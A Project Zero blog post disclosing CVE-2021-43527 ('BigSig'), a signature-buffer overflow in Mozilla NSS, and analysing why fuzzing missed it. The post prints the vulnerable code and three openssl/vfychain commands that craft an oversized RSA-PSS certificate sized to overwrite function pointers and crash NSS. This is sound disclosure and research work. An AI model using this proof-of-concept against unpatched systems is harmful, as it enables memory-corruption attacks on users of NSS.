Posted by Tavis Ormandy, Project Zero
This is an unusual blog post. I normally write posts to highlight some hidden attack surface or interesting complex vulnerability class. This time, I want to talk about a vulnerability that is neither of those things. The striking thing about this vulnerability is just how simple it is. This should have been caught earlier, and I want to explore why that didn’t happen.
In 2021, all good bugs need a catchy name, so I’m calling this one “BigSig”.
First, let’s take a look at the bug, I’ll explain how I found it and then try to understand why we missed it for so long.
Network Security Services (NSS) is Mozilla's widely used, cross-platform cryptography library. When you verify an ASN.1 encoded digital signature, NSS will create a VFYContext structure to store the necessary data. This includes things like the public key, the hash algorithm, and the signature itself.
struct VFYContextStr { SECOidTag hashAlg; /* the hash algorithm */ SECKEYPublicKey *key; union { unsigned char buffer[1]; unsigned char dsasig[DSA_MAX_SIGNATURE_LEN]; unsigned char ecdsasig[2 * MAX_ECKEY_LEN]; unsigned char rsasig[(RSA_MAX_MODULUS_BITS + 7) / 8]; } u; unsigned int pkcs1RSADigestInfoLen; unsigned char *pkcs1RSADigestInfo; void *wincx; void *hashcx; const SECHashObject *hashobj; SECOidTag encAlg; /* enc alg */ PRBool hasSignature; SECItem *params; }; |
Fig 1. The VFYContext structure from NSS. |
The maximum size signature that this structure can handle is whatever the largest union member is, in this case that’s RSA at 2048 bytes. That’s 16384 bits, large enough to accommodate signatures from even the most ridiculously oversized keys.
Okay, but what happens if you just....make a signature that’s bigger than that?
Well, it turns out the answer is memory corruption. Yes, really.
The untrusted signature is simply copied into this fixed-sized buffer, overwriting adjacent members with arbitrary attacker-controlled data.
The bug is simple to reproduce and affects multiple algorithms. The easiest to demonstrate is RSA-PSS. In fact, just these three commands work:
# We need 16384 bits to fill the buffer, then 32 + 64 + 64 + 64 bits to overflow to hashobj, # which contains function pointers (bigger would work too, but takes longer to generate). $ openssl genpkey -algorithm rsa-pss -pkeyopt rsa_keygen_bits:$((16384 + 32 + 64 + 64 + 64)) -pkeyopt rsa_keygen_primes:5 -out bigsig.key # Generate a self-signed certificate from that key $ openssl req -x509 -new -key bigsig.key -subj "/CN=BigSig" -sha256 -out bigsig.cer # Verify it with NSS... $ vfychain -a bigsig.cer Segmentation fault |
Fig 2. Reproducing the BigSig vulnerability in three easy commands. |
The actual code that does the corruption varies based on the algorithm; here is the code for RSA-PSS. The bug is that there is simply no bounds checking at all; sig and key are arbitrary-length, attacker-controlled blobs, and cx->u is a fixed-size buffer.
case rsaPssKey: sigLen = SECKEY_SignatureLen(key); if (sigLen == 0) { /* error set by SECKEY_SignatureLen */ rv = SECFailure; break; } if (sig->len != sigLen) { PORT_SetError(SEC_ERROR_BAD_SIGNATURE); rv = SECFailure; break; } PORT_Memcpy(cx->u.buffer, sig->data, sigLen); break; |
Fig 3. The signature size must match the size of the key, but there are no other limitations. cx->u is a fixed-size buffer, and sig is an arbitrary-length, attacker-controlled blob. |
I think this vulnerability raises a few immediate questions:
This wasn’t a process failure, the vendor did everything right. Mozilla has a mature, world-class security team. They pioneered bug bounties, invest in memory safety, fuzzing and test coverage.
NSS was one of the very first projects included with oss-fuzz, it was officially supported since at least October 2014. Mozilla also fuzz NSS themselves with libFuzzer, and have contributed their own mutator collection and distilled coverage corpus. There is an extensive testsuite, and nightly ASAN builds.
I'm generally skeptical of static analysis, but this seems like a simple missing bounds check that should be easy to find. Coverity has been monitoring NSS since at least December 2008, and also appears to have failed to discover this.
Until 2015, Google Chrome used NSS, and maintained their own testsuite and fuzzing infrastructure independent of Mozilla. Today, Chrome platforms use BoringSSL, but the NSS port is still maintained.
I've been experimenting with alternative methods for measuring code coverage, to see if any have any practical use in fuzzing. The fuzzer that discovered this vulnerability used a combination of two approaches, stack coverage and object isolation.
The most common method of measuring code coverage is block coverage, or edge coverage when source code is available. I’ve been curious if that is always sufficient. For example, consider a simple dispatch table with a combination of trusted and untrusted parameters, as in Fig 4.
#include <stdio.h> #include <string.h> #include <limits.h> static char buf[128]; void cmd_handler_foo(int a, size_t b) { memset(buf, a, b); } void cmd_handler_bar(int a, size_t b) { cmd_handler_foo('A', sizeof buf); } void cmd_handler_baz(int a, size_t b) { cmd_handler_bar(a, sizeof buf); } typedef void (* dispatch_t)(int, size_t); dispatch_t handlers[UCHAR_MAX] = { cmd_handler_foo, cmd_handler_bar, cmd_handler_baz, }; int main(int argc, char **argv) { int cmd; while ((cmd = getchar()) != EOF) { if (handlers[cmd]) { handlers[cmd](getchar(), getchar()); } } } |
Fig 4. The coverage of command bar is a superset of command foo, so an input containing the latter would be discarded during corpus minimization. There is a vulnerability unreachable via command bar that might never be discovered. Stack coverage would correctly keep both inputs.[1] |
To solve this problem, I’ve been experimenting with monitoring the call stack during execution.
The naive implementation is too slow to be practical, but after a lot of optimization I had come up with a library that was fast enough to be integrated into coverage-guided fuzzing, and was testing how it performed with NSS and other libraries.
Many data types are constructed from smaller records. PNG files are made of chunks, PDF files are made of streams, ELF files are made of sections, and X.509 certificates are made of ASN.1 TLV items. If a fuzzer has some understanding of the underlying format, it can isolate these records and extract the one(s) causing some new stack trace to be found.
The fuzzer I was using is able to isolate and extract interesting new ASN.1 OIDs, SEQUENCEs, INTEGERs, and so on. Once extracted, it can then randomly combine or insert them into template data. This isn’t really a new idea, but is a new implementation. I'm planning to open source this code in the future.
I wish that I could say that discovering this bug validates my ideas, but I’m not sure it does. I was doing some moderately novel fuzzing, but I see no reason this bug couldn’t have been found earlier with even rudimentary fuzzing techniques.
How did extensive, customized fuzzing with impressive coverage metrics fail to discover this bug?
NSS is a modular library. This layered design is reflected in the fuzzing approach, as each component is fuzzed independently. For example, the QuickDER decoder is tested extensively, but the fuzzer simply creates and discards objects and never uses them.
extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { char *dest[2048]; for (auto tpl : templates) { PORTCheapArenaPool pool; SECItem buf = {siBuffer, const_cast<unsigned char *>(Data), static_cast<unsigned int>(Size)}; PORT_InitCheapArena(&pool, DER_DEFAULT_CHUNKSIZE); (void)SEC_QuickDERDecodeItem(&pool.arena, dest, tpl, &buf); PORT_DestroyCheapArena(&pool); } |
Fig 5. The QuickDER fuzzer simply creates and discards objects. This verifies the ASN.1 parsing, but not whether other components handle the resulting objects correctly. |
This fuzzer might have produced a SECKEYPublicKey that could have reached the vulnerable code, but as the result was never used to verify a signature, the bug could never be discovered.
There is an arbitrary limit of 10000 bytes placed on fuzzed input. There is no such limit within NSS; many structures can exceed this size. This vulnerability demonstrates that errors happen at extremes, so this limit should be chosen thoughtfully.
A reasonable choice might be 224-1 bytes, the largest possible certificate that can be presented by a server during a TLS handshake negotiation.
While NSS might handle objects even larger than this, TLS cannot possibly be involved, reducing the overall severity of any vulnerabilities missed.
All of the NSS fuzzers are represented in combined coverage metrics by oss-fuzz, rather than their individual coverage. This data proved misleading, as the vulnerable code is fuzzed extensively but by fuzzers that could not possibly generate a relevant input.
This is because fuzzers like the tls_server_target use fixed, hardcoded certificates. This exercises code relevant to certificate verification, but only fuzzes TLS messages and protocol state changes.
It’s debatable whether this was just good fortune or not. It seems likely RSA-PSS would eventually be permitted by mozilla::pkix, even though it was not today.
This issue demonstrates that even extremely well-maintained C/C++ can have fatal, trivial mistakes.
This vulnerability is CVE-2021-43527, and is resolved in NSS 3.73.0. If you are a vendor that distributes NSS in your products, you will most likely need to update or backport the patch.
I would not have been able to find this bug without assistance from my colleagues from Chrome, Ryan Sleevi and David Benjamin, who helped answer my ASN.1 encoding questions and engaged in thoughtful discussion on the topic.
Thanks to the NSS team, who helped triage and analyze the vulnerability.
[1] In this minimal example, a workaround if source was available would be to use a combination of sancov's data-flow instrumentation options, but that also fails on more complex variants.